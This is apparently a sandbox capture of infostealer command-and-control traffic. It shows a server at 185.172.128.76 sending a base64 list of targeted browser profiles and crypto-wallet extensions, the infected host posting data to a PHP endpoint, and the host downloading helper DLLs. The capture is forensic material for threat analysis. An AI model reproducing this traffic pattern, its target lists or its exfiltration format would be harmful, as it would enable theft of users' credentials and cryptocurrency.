Apr 26, 2024 23:09:00.002825975 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:08:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Apr 26, 2024 23:09:00.002840996 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 26, 2024 23:09:00.005433083 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"plugins------FCAFIJJJKEGIECAKKEHI--
Apr 26, 2024 23:09:00.358799934 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Apr 26, 2024 23:09:00.358814001 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 26, 2024 23:09:00.358875990 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 26, 2024 23:09:00.358894110 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 26, 2024 23:09:00.358906984 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 26, 2024 23:09:00.402364969 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF Host: 185.172.128.76 Content-Length: 6183 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:00.402429104 CEST	6183	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 26, 2024 23:09:00.776063919 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:01.232124090 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:01.595376015 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:01 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 26, 2024 23:09:01.595391035 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 26, 2024 23:09:01.595648050 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 26, 2024 23:09:01.595660925 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 26, 2024 23:09:01.595671892 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 26, 2024 23:09:04.546118021 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:04.921005964 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:05.557959080 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:05.939774990 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:06.150240898 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 [TRUNCATED] Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file"------FCAFIJJJKEGIECAKKEHI--
Apr 26, 2024 23:09:06.526704073 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:08.069814920 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCG Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 [TRUNCATED] Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file"------HIDGCFBFBFBKEBGCAFCG--
Apr 26, 2024 23:09:08.448174953 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:08.675903082 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:09.026814938 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:08 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
Apr 26, 2024 23:09:11.467519999 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:11.819706917 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:11 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 